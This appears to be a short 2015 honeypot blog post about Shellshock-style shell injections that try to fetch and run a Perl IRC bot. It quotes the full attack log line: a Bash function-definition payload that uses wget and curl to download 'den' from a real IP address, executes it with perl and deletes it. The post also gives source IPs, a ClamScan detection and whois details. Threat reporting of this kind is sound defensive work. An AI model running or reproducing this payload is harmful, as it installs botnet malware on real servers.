SendMeSpam: Perl script injection: 85.214.60.234/den

The last two days several Shell injections have hit my Honeypot. Any of them tried to download a prscript and execute it

Jun 13 06:42:11 beeswarm [mypyfwa] 2015-06-13 06:42:11.531828 74.208.167.71 - - [12/Jun/2015:20:25:25 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;rm -fr den*\"" "() { :;}; cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;rm -fr den*\"" 74.208.167.71 US SHELLinjection

I have downloaded the file manually, it is a perl IRCbot.

/XFupload.py -f den
{"malware":{"type":"md5","md5":"0x7AE21F4543FE5F842A7BB9F79D95A88E","origins":{"external":{"detectionCoverage":35,"family":["trojan"]}}}}

and

clamscan den
den: Trojan.IRCBot-1142 FOUND

The sources of the attrack are

223.252.35.159 (AU)

74.208.167.71 (US)

Both hosts seem to be hosted servers (1and1 and Ozservers)

The perl script seems to be written by "Jericho Security Team Perl Bot v3.0"
Strange as it is, the server address within the script is set to

place.youredomainhere.net

Or even more strange that this domain is hosted by schlund

inetnum:        87.106.0.0 - 87.106.15.255
netname:        SCHLUND-CUSTOMERS
descr:          1&1 Internet AG
country:        DE

SendMeSpam

Sonntag, 14. Juni 2015

Perl script injection: 85.214.60.234/den

Keine Kommentare:

Kommentar veröffentlichen